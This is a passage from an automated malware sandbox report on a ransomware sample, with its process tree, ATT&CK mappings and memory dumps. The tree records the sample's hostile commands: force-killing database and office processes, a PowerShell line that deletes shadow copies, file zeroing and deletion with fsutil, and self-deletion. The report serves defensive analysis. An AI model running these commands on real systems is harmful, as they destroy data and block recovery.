  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5224
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5256
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5384
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5428
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5480
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5564
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5588
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5628
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5772
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  - Suspicious use of FindShellTrayWindow
  PID:5964
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:5764
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:5960
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
  2⤵
  PID:5868
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:5980

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3904-1-0x0000000000980000-0x0000000000981000-memory.dmp

Filesize
4KB

Download
memory/3904-0-0x00007FF8E2780000-0x00007FF8E316C000-memory.dmp

Filesize
9.9MB

Download
memory/5772-58-0x000002455CCE0000-0x000002455CCE1000-memory.dmp

Filesize
4KB

Download
memory/5772-57-0x0000024541E40000-0x0000024541E41000-memory.dmp

Filesize
4KB

Download
memory/5772-56-0x00007FF8E2780000-0x00007FF8E316C000-memory.dmp

Filesize
9.9MB

Download